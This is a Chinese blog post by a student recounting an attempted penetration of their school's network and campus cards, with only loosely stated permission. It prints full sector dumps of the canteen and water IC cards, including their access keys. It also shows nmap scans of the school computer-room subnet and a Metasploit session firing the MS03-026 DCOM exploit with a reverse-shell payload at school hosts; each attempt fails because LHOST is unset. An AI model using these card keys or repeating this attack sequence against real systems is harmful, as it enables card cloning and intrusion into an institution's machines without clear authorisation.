关于学校网的渗透与入侵

luciferau

已于 2023-06-24 22:29:52 修改

阅读量1.8k

点赞数 2

分类专栏： Ubuntu 脚本文章标签：安全 web安全系统安全 Powered by 金山文档

于 2023-02-11 10:35:36 首次发布

本文链接：https://blog.csdn.net/m0_72703340/article/details/128980841

版权

Ubuntu 同时被 2 个专栏收录

6 篇文章 0 订阅

订阅专栏

脚本

2 篇文章 0 订阅

订阅专栏

2.11.10：28

前提说明:这里的入侵指的是，测试相关漏洞（并不进行相关的入侵以及攻击），事后会上报学校相关部门，当然如果是本校的小伙伴就不用再试了，漏洞扫出来之后会第一时间上报学校，再写文记录。

因为不知道会不会成功，所以一边渗透一边写文吧。

为了渗透学习我特地买了一台kali掌上电脑和一份投影键盘以及Digispark开发板。（当然我们高中并不允许手机入内，此处渗透皆是在学校假期时期完成的）

渗透思路

badusb的使用

kali msf相关渗透

相关端口漏洞及其利用

远程服务器需要

在机房使用kali的Nmap指令进行网段扫描。

注:渗透前会向学校申请。

校园一卡通的渗透，由于校园食堂使用的是一卡通IC卡，所以打算进行渗透。

卡是智慧一卡通的（PN532）

下面是一些渗透出来的数据仅供学习使用，（这里就不讲漏洞的利用与IC卡的爆破了，防止被非法利用）

扇区 0
3e 93 d1 3e 42 08 04 00 03 3f 76 d1 4e d1 cf 1d 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f 
扇区 1
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f 
扇区 2
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f 
扇区 3
00 05 f0 ff fa 0f 00 01 2c 04 26 00 01 66 00 bb 
00 3f 0d 58 00 00 01 b9 f9 bd f0 20 20 20 20 84 
00 00 00 00 00 50 08 31 00 00 00 00 01 00 00 8a 
b2 01 8c 08 d3 0a ff 07 80 69 b2 01 8c 08 d3 0a 
扇区 4
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f 
扇区 5
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f 
扇区 6
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f 
扇区 7
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f 
扇区 8
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f 
扇区 9
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f 
扇区 10
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f 
扇区 11
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f 
扇区 12
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f 
扇区 13
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f 
扇区 14
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f 
扇区 15
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f

水卡数据

扇区 0
39 8a da 06 6f 08 04 00 03 3a c3 e1 22 13 8a 91 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 1
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 2
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 3
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 4
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 5
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 6
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 7
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 8
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 9
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 10
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 11
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 12
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 13
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 14
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff 
扇区 15
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff

下面是机房kali扫描出来的数据

Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:07 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.2
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:6D:E0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.3
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:6D:A8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.4
Host is up (0.00019s latency).
MAC Address: F4:4D:30:51:D7:DD (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.6
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:13:A8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.7
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:16:E3 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.9
Host is up (0.00034s latency).
MAC Address: F4:4D:30:51:16:E0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.11
Host is up (0.00073s latency).
MAC Address: F4:4D:30:51:C5:78 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.12
Host is up (0.00054s latency).
MAC Address: F4:4D:30:51:15:F6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.13
Host is up (0.00030s latency).
MAC Address: F4:4D:30:51:15:F7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.14
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:70:FC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.18
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:6C:B2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.22
Host is up (0.00082s latency).
MAC Address: F4:4D:30:51:14:BC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.23
Host is up (0.00079s latency).
MAC Address: F4:4D:30:51:15:E5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.24
Host is up (0.00075s latency).
MAC Address: F4:4D:30:52:1E:78 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.26
Host is up (0.00021s latency).
MAC Address: F4:4D:30:51:15:4A (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.27
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:12:A6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.28
Host is up (0.00098s latency).
MAC Address: F4:4D:30:51:12:A4 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.29
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:71:D9 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.31
Host is up (0.00020s latency).
MAC Address: F4:4D:30:51:6C:5C (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.32
Host is up (0.00015s latency).
MAC Address: F4:4D:30:52:1E:DD (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.33
Host is up (0.00072s latency).
MAC Address: F4:4D:30:51:6D:E7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.34
Host is up (0.00025s latency).
MAC Address: F4:4D:30:51:13:A7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.35
Host is up (0.00072s latency).
MAC Address: F4:4D:30:51:14:12 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.36
Host is up (0.00070s latency).
MAC Address: F4:4D:30:52:21:36 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.37
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:6D:A0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.38
Host is up (0.00056s latency).
MAC Address: F4:4D:30:51:12:B6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.39
Host is up (0.00069s latency).
MAC Address: F4:4D:30:51:14:AC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.40
Host is up (0.00079s latency).
MAC Address: F4:4D:30:51:6D:EC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.41
Host is up (0.00080s latency).
MAC Address: F4:4D:30:51:14:B8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.44
Host is up (0.00067s latency).
MAC Address: F4:4D:30:51:6D:56 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.45
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:71:D5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.46
Host is up (0.00012s latency).
MAC Address: F4:4D:30:51:6C:44 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.48
Host is up (0.00053s latency).
MAC Address: F4:4D:30:51:71:72 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.49
Host is up (0.00053s latency).
MAC Address: F4:4D:30:51:6C:80 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.51
Host is up (0.00069s latency).
MAC Address: F4:4D:30:51:13:2F (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.52
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:71:E1 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.53
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:8F:77 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.55
Host is up (0.00074s latency).
MAC Address: F4:4D:30:51:6E:AF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.58
Host is up (0.00070s latency).
MAC Address: F4:4D:30:51:6C:6B (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.61
Host is up (0.00080s latency).
MAC Address: F4:4D:30:51:17:D7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.65
Host is up (0.00078s latency).
MAC Address: F4:4D:30:51:71:E2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.67
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:94 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.69
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:6D:CF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.70
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:BF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.71
Host is up (0.00025s latency).
MAC Address: C4:70:AB:63:44:8E (Ruijie Networks)
Nmap scan report for kali.lan (192.168.2.208)
Host is up.
Nmap done: 256 IP addresses (47 hosts up) scanned in 5.66 seconds

Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:12 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00040s latency).
Not shown: 8885 filtered tcp ports (no-resposernse)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 22.55 seconds
                                                                   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:17 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00035s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|8|Vista|2008
OS CPE: cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1
OS details: Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds

Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:23 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00025s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds


Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:27 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00030s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
\


                                                                          
┌──(root㉿kali)-[/home/kali]
└─# msfconsole
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v6.3.4-dev                           ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use help <command> to learn more 
about any command
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search dcom

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank       Check  Description
   -   ----                                                  ---------------  ----       -----  -----------
   0   exploit/windows/nimsoft/nimcontroller_bof             2020-02-05       excellent  Yes    CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
   1   auxiliary/scanner/smb/impacket/dcomexec               2018-03-19       normal     No     DCOM Exec
   2   auxiliary/scanner/smb/impacket/secretsdump                             normal     No     DCOM Exec
   3   exploit/windows/http/dnn_cookie_deserialization_rce   2017-07-20       excellent  Yes    DotNetNuke Cookie Deserialization Remote Code Excecution
   4   exploit/windows/dcerpc/ms03_026_dcom                  2003-07-16       great      Yes    MS03-026 Microsoft RPC DCOM Interface Overflow
   5   exploit/windows/smb/ms04_031_netdde                   2004-10-12       good       No     MS04-031 Microsoft NetDDE Service Overflow
   6   auxiliary/scanner/telnet/telnet_ruggedcom                              normal     No     RuggedCom Telnet Password Generator
   7   auxiliary/admin/dcerpc/samr_computer                                   normal     No     SAMR Computer Management
   8   auxiliary/scanner/http/symantec_brightmail_ldapcreds  2015-12-17       normal     No     Symantec Messaging Gateway 10 Exposure of Stored AD Password Vulnerability
   9   auxiliary/scanner/http/symantec_brightmail_logfile    2012-11-30       normal     No     Symantec Messaging Gateway 9.5 Log File Download Vulnerability
   10  exploit/windows/local/ms16_075_reflection             2016-01-16       normal     Yes    Windows Net-NTLMv2 Reflection DCOM/RPC
   11  exploit/windows/local/ms16_075_reflection_juicy       2016-01-16       great      Yes    Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)


Interact with a module by name or index. For example info 11, use 11 or use exploit/windows/local/ms16_075_reflection_juicy                               

msf6 > use exploit/windows/dcerpc/ms03_026_dcom
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show options]
[-] Invalid parameter "options]", use "show -h" for more information                            
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show options
                                                                                                
Module options (exploit/windows/dcerpc/ms03_026_dcom):                                          
                                                                                                
   Name    Current Setting  Required  Description                                               
   ----    ---------------  --------  -----------                                               
   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs  
                                      /using-metasploit/basics/using-metasploit.html            
   RPORT   135              yes       The target port (TCP)                                     
                                                                                                
                                                                                                
Payload options (windows/shell/reverse_tcp):                                                    
                                                                                                
   Name      Current Setting  Required  Description                                             
   ----      ---------------  --------  -----------                                             
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, no  
                                        ne)                                                     
   LHOST                      yes       The listen address (an interface may be specified)      
   LPORT     4444             yes       The listen port                                         
                                                                                                
                                                                                                
Exploit target:                                                                                 
                                                                                                
   Id  Name                                                                                     
   --  ----                                                                                     
   0   Windows NT SP3-6a/2000/XP/2003 Universal                                                 



View the full module info with the info, or info -d command.

msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.208
RHOSTS => 192.168.2.208
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit

[-] 192.168.2.208:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set LHOSTS 192.168.2.208
[-] Unknown datastore option: LHOSTS. Did you mean LHOST?
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.208
RHOSTS => 192.168.2.208
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit

[-] 192.168.2.208:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run

[-] 192.168.2.208:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
RHOSTS => 192.168.2.1
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run

[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit

[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit

[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit

[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
RHOSTS => 192.168.2.1
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit

[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exit
                                                                                                                                                                                                    
┌──(root㉿kali)-[/home/kali]
└─# msfconsole
                                                  

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V5                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           https://metasploit.com


       =[ metasploit v6.3.4-dev                           ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Metasploit can be configured at startup, see 
msfconsole --help to learn more
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/windows/dcerpc/ms03_026_dcom
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.208
RHOSTS => 192.168.2.208
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
RHOSTS => 192.168.2.1
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit

[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > 
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
RHOSTS => 192.168.2.1
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit

[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.2.208  netmask 255.255.255.0  broadcast 192.168.2.255
        inet6 fe80::3103:3e0a:d4e8:8ef8  prefixlen 64  scopeid 0x20<link>
        ether f4:4d:30:51:d6:df  txqueuelen 1000  (Ethernet)
        RX packets 93  bytes 16309 (15.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 65  bytes 10441 (10.1 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 4  bytes 240 (240.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4  bytes 240 (240.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                             
┌──(root㉿kali)-[/home/kali]
└─# Namp -sP 192.168.2.0/24
Command 'Namp' not found, did you mean:
  command 'wamp' from deb python3-autobahn
  command 'pamp' from deb paml
Try: apt install <deb name>
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# apt-get install Namp   
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package Namp
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# apt-get install namp
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package namp
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# Nmap -sP 192.168.2.0/24
Command 'Nmap' not found, did you mean:
  command 'gmap' from deb gmap
  command 'nmap' from deb nmap
  command 'zmap' from deb zmap
  command 'tmap' from deb emboss
  command 'umap' from deb libunicode-map8-perl
  command 'pmap' from deb procps
  command 'amap' from deb amap
  command 'amap' from deb amap-align
Try: apt install <deb name>
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# apt-get install nmap   
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
nmap is already the newest version (7.93+dfsg1-0kali2).
nmap set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.2.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:07 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.2
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:6D:E0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.3
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:6D:A8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.4
Host is up (0.00019s latency).
MAC Address: F4:4D:30:51:D7:DD (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.6
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:13:A8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.7
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:16:E3 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.9
